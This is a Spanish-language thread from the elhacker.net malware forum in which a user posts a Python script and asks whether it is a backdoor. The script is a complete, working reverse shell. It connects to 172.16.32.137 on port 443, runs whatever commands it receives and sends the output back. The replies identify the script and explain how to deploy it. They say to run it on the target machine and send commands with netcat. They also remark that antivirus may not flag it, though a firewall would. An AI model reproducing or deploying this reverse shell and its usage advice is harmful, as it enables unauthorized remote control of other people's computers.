elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Codigo fuente de un "Backdoor"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Codigo fuente de un "Backdoor"  (Leído 10,075 veces)
Danirs

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Codigo fuente de un "Backdoor"
« en: 12 Agosto 2012, 15:51 pm »

Buenas!

Encontre este codigo de un backdoor en un manual que tengo, que la verdad no se que hacia alli porque no era un manual de malware... pero bueno el caso es que no se si es un backdoor ya que no entiendo de python, tiene pinta de que si pero para salir de dudas lo posteo aqui, a ver si me podeis ayudar:

Código
  1. #!/usr/bin/python
  2. # imports here
  3. import socket,subprocess
  4. HOST = '172.16.32.137' # The remote host
  5. PORT = 443 # The same port as used by the server
  6. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  7. # connect to attacker machine
  8. s.connect((HOST, PORT))
  9. # send we are connected
  10. s.send('[*] Connection Established!')
  11. # start loop
  12. while 1:
  13. # recieve shell command
  14. data = s.recv(1024)
  15. # if its quit, then break out and close socket
  16. if data == "quit": break
  17. # do shell command
  18. proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  19. # read output
  20. stdout_value = proc.stdout.read() + proc.stderr.read()
  21. # send output to attacker
  22. s.send(stdout_value)
  23. # close socket
  24. s.close()

Gracias!
En línea

Qué es la vida un frenesí. Qué es la vida una ilusión, una sombra, una ficción. Que todo en la vida es sueño y los sueños, sueños son.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Codigo fuente de un "Backdoor"
« Respuesta #1 en: 12 Agosto 2012, 18:06 pm »

Falta indentarlo. Aún así esto no es un backdoor, es una shell inversa. Ejecutas este código ,se conecta a 'HOST' por el puerto 'PORT' y obtienes una shell (cmd en caso de windows).

Si tienes alguna duda respecto al código pregunta, aunque está bien comentado.

Un saludo
En línea

Danirs

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Re: Codigo fuente de un "Backdoor"
« Respuesta #2 en: 12 Agosto 2012, 18:20 pm »

Muchas gracias por responder, ahora que me has aclarado me asaltan las dudas:

Si lo quiero testear en mi otro ordenador lo unico que tengo que hacer es poner el formato de python y ejecutarlo no? y si lo ejecuto una vez en el ordenador me saldra la shell del otro y al apagar el ordenador victima se pierde la conexion y tendria que volver a ejecutarlo?

Esto lo detectan lo AV? Porque en el manual salia que era indetectable a 43 AV...no lo creo la verdad

Funciona tambien en linux?

Gracias!  ;D
« Última modificación: 12 Agosto 2012, 18:39 pm por Danirs » En línea

Qué es la vida un frenesí. Qué es la vida una ilusión, una sombra, una ficción. Que todo en la vida es sueño y los sueños, sueños son.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Codigo fuente de un "Backdoor"
« Respuesta #3 en: 12 Agosto 2012, 18:45 pm »

En teoría este código funciona bajo cualquier SO en el que puedas instalar el intérprete Python.
Es posible que ningún AV lo detecte, pero has de saber que cualquier Firewall saltaría en el intento de conexión remota.

Respecto a la forma de uso: Esto se ejecuta en el ordenador del cual quieres obtener la shell y desde donde se controla ésta (es decir, el 'HOST') tienes que tener algo para enviar los comandos. Puedes hacerte tu mismo otro script en Python o bien usar el netcat que es una herramienta muy útil en estos casos. Tan sólo tienes que bindear el puerto 'PORT' y empezar a enviar comandos.
En línea

Danirs

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Re: Codigo fuente de un "Backdoor"
« Respuesta #4 en: 12 Agosto 2012, 18:58 pm »

Gracias por responder.

Y no vale un puerto cualquiera para poner no? 443 es el que viene por defecto, entonces es el mejor para estas ocasiones?

Gracias! (Perdon por mi ignorancia no se mucho de esto xD)
En línea

Qué es la vida un frenesí. Qué es la vida una ilusión, una sombra, una ficción. Que todo en la vida es sueño y los sueños, sueños son.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Codigo fuente de un "Backdoor"
« Respuesta #5 en: 12 Agosto 2012, 23:07 pm »

Nadie nace sabiendo. El puerto es indiferente. Hay algunos puertos reservados para distintos tipos de protocolos (p.e: http -> 80). Pero eso no impide que se use para cualquier otra función, aún así puede que el puerto esté ya bindeado y no puedas usarlo.

+Info:
Citar
En línea

Danirs

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Re: Codigo fuente de un "Backdoor"
« Respuesta #6 en: 12 Agosto 2012, 23:26 pm »

Pues muchas gracias por responder me aclaraste todas las dudas Gracias! ;D ;D
En línea

Qué es la vida un frenesí. Qué es la vida una ilusión, una sombra, una ficción. Que todo en la vida es sueño y los sueños, sueños son.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines